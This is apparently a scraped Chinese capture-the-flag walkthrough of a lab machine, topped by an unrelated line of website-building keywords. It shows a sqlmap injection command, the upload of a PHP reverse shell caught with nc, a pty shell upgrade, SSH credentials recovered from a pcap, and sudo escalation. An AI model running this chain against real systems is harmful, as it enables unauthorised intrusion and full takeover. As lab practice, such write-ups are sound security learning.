大淘客可以做几个网站,自贸区网站建设,可以让外国人做问卷调查的网站,松江新桥专业网站建设信息收集
靶机发现 端口扫描 页面访问#xff0c;并查看源码 访问 /nt4stopc/,下面有一些问题#xff0c;提示必须收集答案 一些判断题#xff0c;对与错对应1与0#xff0c;最后结果为0110111001#xff0c;拼接访问 点击图中位置#xff0c;发现存在参数#xff0c;p…信息收集
靶机发现 端口扫描 页面访问并查看源码 访问 /nt4stopc/,下面有一些问题提示必须收集答案 一些判断题对与错对应1与0最后结果为0110111001拼接访问 点击图中位置发现存在参数php语言尝试注入 是存在注入的使用 sqlmap 跑一下
python3 sqlmap.py -u http://192.168.93.162/nt4stopc/0110111001/summertimesummertime/go.php?id1 --batch --dbs gereksiz 下得到一串值:
hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf folder upload.php
解码后得到:
uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas
可能是路径拼接访问
http://192.168.93.162/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/ 再拼接 upload.php 文件上传以md5提交但是没有提交按钮自己在前端给加一个
input typesubmit 获取shell
kali 生成反弹 shell
locate php-reverse-shell.phpcp /usr/share/webshells/php/php-reverse-shell.php .vim php-reverse-shell.php 上传该文件后返回了文件路径文件名为md5加密后的 nc监听访问文件成功反弹shell 提权
python3 -c import pty;pty.spawn(/bin/bash) 在 /var/www/html 下发现 important.pcapng,查看文件发现内容 url解码得到以下数据
emailmkelepcemessageHello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it. Good work账号密码
mkelepce:mklpc-osas112.
ssh连接连接成功 查看权限 sudo su 提权成功
